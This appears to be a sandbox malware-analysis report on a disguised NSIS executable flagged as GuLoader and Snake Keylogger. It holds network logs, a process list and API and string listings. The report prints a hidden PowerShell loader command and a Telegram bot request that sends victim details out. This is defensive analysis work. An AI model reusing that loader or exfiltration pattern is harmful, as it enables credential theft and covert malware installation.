2024-10-21 09:04:18 UTC	890	IN	HTTP/1.1 200 OK Date: Mon, 21 Oct 2024 09:04:18 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 27123 Last-Modified: Mon, 21 Oct 2024 01:32:15 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vmz1uYSET47gpqgSv4ZKRjbBv0muzOOhFUYnQHRoTNE6SYjnOxcqIzCnsBkRDKvaKa0nkaowqmK6R0WfUVmSwzDn2lGKvgYy1zal9kcIKEwJ2IkpPc40%2F1XkyT8aFM5k3Cco1AZI"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d6014514a286b46-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1584&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=1793188&cwnd=246&unsent_bytes=0&cid=eef24e7d9a310363&ts=150&x=0"
2024-10-21 09:04:18 UTC	365	IN	Data Raw: 31 36 36 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a Data Ascii: 166<Response><IP>155.94.241.186</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZ
2024-10-21 09:04:18 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	62524	188.114.97.3	443	7808	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-21 09:04:19 UTC	87	OUT	GET /xml/155.94.241.186 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-21 09:04:19 UTC	890	IN	HTTP/1.1 200 OK Date: Mon, 21 Oct 2024 09:04:19 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 27124 Last-Modified: Mon, 21 Oct 2024 01:32:15 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GfVnMBknqIqhQtKMLKYiRlbwk8y1i7dYXfePLUHG9NuvRzroRIMrR6ng9OWrQTLwtYm9oCFcm4GTcalpQLdEU51qyOHciOC33Oz34uUILFiqhpq%2BXsOgYqNqltIzUXBActPCbojp"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d60145b3ffae946-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1144&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2500863&cwnd=250&unsent_bytes=0&cid=833788a2f68751c7&ts=333&x=0"
2024-10-21 09:04:19 UTC	365	IN	Data Raw: 31 36 36 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a Data Ascii: 166<Response><IP>155.94.241.186</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZ
2024-10-21 09:04:19 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	62526	188.114.97.3	443	7808	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-21 09:04:21 UTC	87	OUT	GET /xml/155.94.241.186 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-21 09:04:21 UTC	904	IN	HTTP/1.1 200 OK Date: Mon, 21 Oct 2024 09:04:21 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 27126 Last-Modified: Mon, 21 Oct 2024 01:32:15 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=g2vhs74R9ot5Dtljg7qr0eB2%2F%2FATLQU3NuTvrrhOuIfn7qKI59uHpNs6LCXXp%2BWjj%2FYBwIb%2F2KBGMd%2BuM3jWn7zeqEv09EGkwGZPdamjeHyjhB6%2FHRj%2BqNrANnvMUiJmo4rIcXsP"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d6014669edb479f-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1088&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=2354471&cwnd=251&unsent_bytes=0&cid=b040fa4a26420e89&ts=148&x=0"
2024-10-21 09:04:21 UTC	365	IN	Data Raw: 31 36 36 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a Data Ascii: 166<Response><IP>155.94.241.186</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZ
2024-10-21 09:04:21 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	62527	149.154.167.220	443	7808	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-21 09:04:22 UTC	349	OUT	GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:138727%0D%0ADate%20and%20Time:%2021/10/2024%20/%2019:07:34%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20138727%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2024-10-21 09:04:22 UTC	344	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Mon, 21 Oct 2024 09:04:22 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-10-21 09:04:22 UTC	55	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}

Target ID:	0
Start time:	05:03:36
Start date:	21/10/2024
Path:	C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe"
Imagebase:	0x400000
File size:	895'897 bytes
MD5 hash:	400AE56B0E2F429C20F563959042B2E9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	05:03:37
Start date:	21/10/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"powershell.exe" -windowstyle hidden "$Laseredes=Get-Content -raw 'C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Vandrerlav.syn';$Overrislingerne=$Laseredes.SubString(15504,3);.$Overrislingerne($Laseredes)"
Imagebase:	0xa10000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.1875277086.0000000009583000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	05:03:37
Start date:	21/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	05:03:55
Start date:	21/10/2024
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\msiexec.exe"
Imagebase:	0x9c0000
File size:	59'904 bytes
MD5 hash:	9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.4128839595.000000002019D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000004.00000002.4128839595.0000000020091000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	24.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	23%
Total number of Nodes:	1250
Total number of Limit Nodes:	42

Executed Functions

Function 0040310F Relevance: 93.1, APIs: 33, Strings: 20, Instructions: 357
stringcomfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE ref: 00403134
GetVersion.KERNEL32 ref: 0040313A
lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403163
#17.COMCTL32(00000007,00000009), ref: 00403185
OleInitialize.OLE32(00000000), ref: 0040318C
SHGetFileInfoA.SHELL32(00428828,00000000,?,00000160,00000000), ref: 004031A8
GetCommandLineA.KERNEL32(Blaggard Setup,NSIS Error), ref: 004031BD
GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe",00000000), ref: 004031D0
CharNextA.USER32(00000000,"C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe",00000020), ref: 004031FB
GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 004032F8
GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 00403309
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403315
GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403329
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403331
SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403342
SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040334A
DeleteFileA.KERNELBASE(1033), ref: 0040335E

Part of subcall function 004060C8: GetModuleHandleA.KERNEL32(?,?,?,00403179,00000009), ref: 004060DA
Part of subcall function 004060C8: GetProcAddress.KERNEL32(00000000,?), ref: 004060F5

OleUninitialize.OLE32(?), ref: 0040340C
ExitProcess.KERNEL32 ref: 0040342D
GetCurrentProcess.KERNEL32(00000028,?), ref: 0040354A
OpenProcessToken.ADVAPI32(00000000), ref: 00403551
LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403569
AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 00403588
ExitWindowsEx.USER32(00000002,80040002), ref: 004035AC
ExitProcess.KERNEL32 ref: 004035CF

Part of subcall function 00405525: MessageBoxIndirectA.USER32(00409218), ref: 00405580

Strings

.tmp, xrefs: 00403454
SeShutdownPrivilege, xrefs: 00403563
C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Svarbrevets, xrefs: 004033E9
Blaggard Setup, xrefs: 004031B3
C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian, xrefs: 004032DD, 004033DE, 00403488, 00403491
UXTHEME, xrefs: 00403157, 0040315C, 00403162
"C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe", xrefs: 004031C3, 004031C9, 00403382
C:\Users\user\AppData\Local\Temp\, xrefs: 004032ED, 004032F2, 00403308, 00403314, 00403323, 00403330, 0040333C, 00403344, 0040343D, 0040344E, 00403459, 00403465, 00403472, 00403481, 00403530
C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe, xrefs: 004034EA
`Kt, xrefs: 00403336
", xrefs: 00403220
TEMP, xrefs: 0040333D
NSIS Error, xrefs: 004031AE
Error launching installer, xrefs: 004033C4
Low, xrefs: 0040332B
\Temp, xrefs: 0040330F
~nsu, xrefs: 00403438
1033, xrefs: 00403359
TMP, xrefs: 00403345
C:\Users\user\Desktop, xrefs: 0040345F, 00403464, 00403490

Memory Dump Source

Source File: 00000000.00000002.1695394960.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1695381081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695410954.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PAGO FRAS.jbxd

Similarity

API ID: Process$Exit$EnvironmentFileHandleModulePathTempTokenVariableWindowslstrcat$AddressAdjustCharCommandCurrentDeleteDirectoryErrorIndirectInfoInitializeLineLookupMessageModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrlen
String ID: "$"C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe"$.tmp$1033$Blaggard Setup$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian$C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Svarbrevets$C:\Users\user\Desktop$C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$`Kt$~nsu
API String ID: 3329125770-2042827967
Opcode ID: dcb38b1e2b76dc19c0501d8e0158ad62898b17a6a9361bfb335ac8dc35fe19f6
Instruction ID: 749ed98c63e487a66f460374afa67f5348490bcf6ac540fe4d7c6930d14d49f5
Opcode Fuzzy Hash: dcb38b1e2b76dc19c0501d8e0158ad62898b17a6a9361bfb335ac8dc35fe19f6
Instruction Fuzzy Hash: E1C105306086416AE7216F61AC4DA6F3EACEF46706F04457FF541BA1E3C77C9A058B2E

Function 004048C5 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481
windowmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDlgItem.USER32(?,000003F9), ref: 004048DD
GetDlgItem.USER32(?,00000408), ref: 004048E8
GlobalAlloc.KERNEL32(00000040,?), ref: 00404932
LoadBitmapA.USER32(0000006E), ref: 00404945
SetWindowLongA.USER32(?,000000FC,00404EBC), ref: 0040495E
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404972
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404984
SendMessageA.USER32(?,00001109,00000002), ref: 0040499A
SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 004049A6
SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 004049B8
DeleteObject.GDI32(00000000), ref: 004049BB
SendMessageA.USER32(?,00000143,00000000,00000000), ref: 004049E6
SendMessageA.USER32(?,00000151,00000000,00000000), ref: 004049F2
SendMessageA.USER32(?,00001100,00000000,?), ref: 00404A87
SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404AB2
SendMessageA.USER32(?,00001100,00000000,?), ref: 00404AC6
GetWindowLongA.USER32(?,000000F0), ref: 00404AF5
SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404B03
ShowWindow.USER32(?,00000005), ref: 00404B14
SendMessageA.USER32(?,00000419,00000000,?), ref: 00404C11
SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404C76
SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404C8B
SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404CAF
SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404CCF
ImageList_Destroy.COMCTL32(?), ref: 00404CE4
GlobalFree.KERNEL32(?), ref: 00404CF4
SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404D6D
SendMessageA.USER32(?,00001102,?,?), ref: 00404E16
SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404E25
InvalidateRect.USER32(?,00000000,00000001), ref: 00404E45
ShowWindow.USER32(?,00000000), ref: 00404E93
GetDlgItem.USER32(?,000003FE), ref: 00404E9E
ShowWindow.USER32(00000000), ref: 00404EA5

Strings

, xrefs: 00404E7D
M, xrefs: 00404A6E
N, xrefs: 00404B4F

Memory Dump Source

Source File: 00000000.00000002.1695394960.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1695381081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695410954.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PAGO FRAS.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 1638840714-813528018
Opcode ID: 98e2d7c6ee6a234b068a5e6a8c88a9cece07b0d44b3c2dcd542ae9ed88053873
Instruction ID: ee94c2e81ac7fcd3d2633371b1ae487f30220c2a0e0de663c2dd45f1c85c3c3c
Opcode Fuzzy Hash: 98e2d7c6ee6a234b068a5e6a8c88a9cece07b0d44b3c2dcd542ae9ed88053873
Instruction Fuzzy Hash: D70262B0A00209AFEB20DF55DC45AAE7BB5FB84315F14413AF610BA2E1C7799D51CF58

Function 00405D51 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 199
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersion.KERNEL32(?,00429048,00000000,00404F80,00429048,00000000), ref: 00405E02
GetSystemDirectoryA.KERNEL32(Space required: ,00000400), ref: 00405E7D
GetWindowsDirectoryA.KERNEL32(Space required: ,00000400), ref: 00405E90
SHGetSpecialFolderLocation.SHELL32(?,0041C205), ref: 00405ECC
SHGetPathFromIDListA.SHELL32(0041C205,Space required: ), ref: 00405EDA
CoTaskMemFree.OLE32(0041C205), ref: 00405EE5
lstrcatA.KERNEL32(Space required: ,\Microsoft\Internet Explorer\Quick Launch), ref: 00405F07
lstrlenA.KERNEL32(Space required: ,?,00429048,00000000,00404F80,00429048,00000000), ref: 00405F59

Strings

Space required: , xrefs: 00405D78, 00405E4A, 00405E67, 00405E7C, 00405E8F, 00405EAB, 00405ED6, 00405F06, 00405F0C, 00405F24, 00405F37, 00405F52, 00405F58, 00405F63, 00405F8D
Software\Microsoft\Windows\CurrentVersion, xrefs: 00405E4C
\Microsoft\Internet Explorer\Quick Launch, xrefs: 00405F01

Memory Dump Source

Source File: 00000000.00000002.1695394960.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1695381081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695410954.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PAGO FRAS.jbxd

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
String ID: Software\Microsoft\Windows\CurrentVersion$Space required: $\Microsoft\Internet Explorer\Quick Launch
API String ID: 900638850-1002770640
Opcode ID: 672f3ffac8e58b905acbb07927a48302432eebfa17072ae61d639ec34a28093f
Instruction ID: d2d5afd6cadd1c558da9919d7f7a0e519c97b97f5b6dedc277a7ce0050389877
Opcode Fuzzy Hash: 672f3ffac8e58b905acbb07927a48302432eebfa17072ae61d639ec34a28093f
Instruction Fuzzy Hash: 99610671A04916ABEF216B24DC85BBF7BA8DB15314F10813BE941BA2D1D33C4942DF9E

Function 004055D1 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 159
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileA.KERNELBASE(?,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004055FA
lstrcatA.KERNEL32(0042A870,\*.*,0042A870,?,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405642
lstrcatA.KERNEL32(?,00409014,?,0042A870,?,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405663
lstrlenA.KERNEL32(?,?,00409014,?,0042A870,?,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405669
FindFirstFileA.KERNEL32(0042A870,?,?,?,00409014,?,0042A870,?,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040567A
FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405727
FindClose.KERNEL32(00000000), ref: 00405738

Strings

"C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe", xrefs: 004055D1
C:\Users\user\AppData\Local\Temp\, xrefs: 004055DE
\*.*, xrefs: 0040563C

Memory Dump Source

Source File: 00000000.00000002.1695394960.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1695381081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695410954.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PAGO FRAS.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe"$C:\Users\user\AppData\Local\Temp\$\*.*
API String ID: 2035342205-3322663958
Opcode ID: 2b7e5661b8b3b760765e09419aafe74f52747e63502cbb40739d7b63bde2251d
Instruction ID: d14c28ea715dd5a13497ef66355ac6b33f8f035006b682f92d24d725560d25e8
Opcode Fuzzy Hash: 2b7e5661b8b3b760765e09419aafe74f52747e63502cbb40739d7b63bde2251d
